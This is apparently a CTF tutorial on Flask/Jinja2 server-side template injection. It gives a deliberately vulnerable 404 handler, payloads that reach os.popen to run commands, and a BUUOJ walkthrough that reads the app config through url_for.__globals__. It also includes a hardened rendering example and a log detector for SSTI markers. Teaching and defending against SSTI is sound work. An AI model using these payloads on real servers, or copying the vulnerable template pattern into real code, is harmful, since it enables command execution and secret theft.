SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is SSTI injection?
SSTI (Server-Side Template Injection) arises where a server-side template takes user input into its output and the application filters that input loosely. An attacker crafts input that the template engine evaluates as template code, which can lead to reading files or to getshell. In current CTFs, most SSTI challenges target Python.
2. Causes and conditions for exploitation
A website builds its output pages by combining data with a template framework: the data in the database does not change, while the template renders it in various ways to give different visual presentations. When the template contains parameter variables the user controls, or the template code exposes template debugging functionality, SSTI can result. The injection exists for most scripting languages; in CTFs, Python is by far the most common target.
3. What are the hazards?
It can lead to file reading, command execution, code execution, and so on.
Payload analysis reference:
0x01 Understanding SSTI through a case
Sensitive functions to look for:
flask
render_template_string
Python case study:
from flask import Flask
from flask import request
from flask import render_template_string

app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"

@app.route('/')
def hello_world():
    return 'Hello World!'

@app.errorhandler(404)
def page_not_found(e):
    # Vulnerable by design: the 404_url query parameter is spliced into the
    # template SOURCE with %s before render_template_string() compiles it,
    # so attacker-controlled text is interpreted as Jinja2 code.
    template = '''
{%% block body %%}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
The injected expression is executed by the Python interpreter, so this is injection in the full sense.
With a suitable payload this becomes RCE: files can be read and commands run on the host.
The payload below reaches popen through the os._wrap_close class (the subclass index, 128 here, depends on the interpreter version and loaded modules, so it has to be located in each environment):
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
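The root cause in the 404 handler above is that user input becomes part of the template source. As an added example (not the article's code), the same handler is written twice, once vulnerable and once hardened, using Jinja2 directly since Flask's render_template_string is a thin wrapper over it; the context variable name requested is my own choice.

```python
# Added example, not from the article: vulnerable vs. hardened 404 rendering.
# Assumes Jinja2 is installed (it is Flask's template engine).
from jinja2 import Environment

# Flask's render_template_string enables autoescaping for string templates too.
env = Environment(autoescape=True)


def render_404_vulnerable(url_param: str) -> str:
    """Mirrors the article's handler: input is %-formatted into the TEMPLATE
    SOURCE before compilation, so "{{ 7*7 }}" is evaluated as template code."""
    template = '''
{%% block body %%}
<h3>%s</h3>
{%% endblock %%}
''' % (url_param,)
    return env.from_string(template).render()


# Hardened: the template source is a constant; the user value travels as DATA
# through the render context, so the engine only prints (and escapes) it.
SAFE_404_TEMPLATE = '''
{% block body %}
<h3>{{ requested }}</h3>
{% endblock %}
'''


def render_404_safe(url_param: str) -> str:
    return env.from_string(SAFE_404_TEMPLATE).render(requested=url_param)


if __name__ == "__main__":
    probe = "{{ 7*7 }}"          # the classic "does the engine evaluate me?" check
    print(render_404_vulnerable(probe))   # body contains 49
    print(render_404_safe(probe))         # body contains the literal {{ 7*7 }}
```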
0x02 CTF case study
https://buuoj.cn/
Challenge page:
Submitting an arithmetic expression such as 2-2 and seeing it evaluated confirms that SSTI exists.
List all the global variables, then reference them to reach the application config.
Use the globals to read the config value as follows.
url_for() builds the URL for a given view function.
get_flashed_messages() retrieves the messages passed to the template.
Both are Flask template globals, so they stay reachable from the Jinja2 context even when the config object itself cannot be named directly.
Get the globals:
/shrine/{{url_for.__globals__}}
or
/shrine/{{get_flashed_messages.__globals__}}
Read the config through those globals:
/shrine/{{url_for.__globals__['current_app'].config}}
or
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
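From the defender's side, the payloads above leave recognisable traces in web-server access logs. As an added example (not from the article), the following detection pass URL-decodes each request path and flags the Jinja2 delimiters and dunder-chain names used in the payloads; the log lines are constructed, not real traffic.

```python
# Added example, not from the article: spot SSTI probes in access-log lines.
import re
from urllib.parse import unquote

# Markers taken from the payload shapes discussed on this page: Jinja2
# delimiters plus the attribute chain from a string literal to os.popen /
# current_app.config.
SSTI_MARKERS = re.compile(
    r"\{\{|\{%|__class__|__subclasses__|__globals__|__init__|__mro__|"
    r"url_for|get_flashed_messages|current_app",
    re.IGNORECASE,
)

# Minimal Common Log Format extraction: method, request path, status code.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def decode_fully(s: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (probes are often double-encoded)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_ssti_probes(log_lines):
    """Return (decoded_path, status, markers) for each request that looks like an SSTI probe."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = decode_fully(m.group("path"))
        markers = sorted({x.lower() for x in SSTI_MARKERS.findall(path)})
        if markers:
            hits.append((path, int(m.group("status")), markers))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jul/2022:03:47:00 +0000] "GET /shrine/%7B%7Burl_for.__globals__%7D%7D HTTP/1.1" 200 512',
    '10.0.0.5 - - [06/Jul/2022:03:47:01 +0000] "GET /missing?404_url=%7B%7B7*7%7D%7D HTTP/1.1" 404 210',
    '10.0.0.9 - - [06/Jul/2022:03:47:02 +0000] "GET /static/app.css HTTP/1.1" 200 3021',
    '10.0.0.5 - - [06/Jul/2022:03:47:03 +0000] "GET /missing?404_url=%257B%257B+2-2+%257D%257D HTTP/1.1" 404 205',
]

if __name__ == "__main__":
    for path, status, markers in find_ssti_probes(SAMPLE_LOG):
        print(status, markers, path)
```

Probes that land on a 404 handler, like the second and fourth lines, are exactly the case the Flask example above is vulnerable to.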
Addendum: pyc decompilation
pyc is also a form of script packaging, similar to:
aspx: DLL files
java: .class/jar/war files
pyc can be decompiled; there are also harder-to-decompile formats such as pyd.
pyc decompilation references:
Online decompilation platforms:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
Decompiler: https://github.com/wibiti/uncompyle2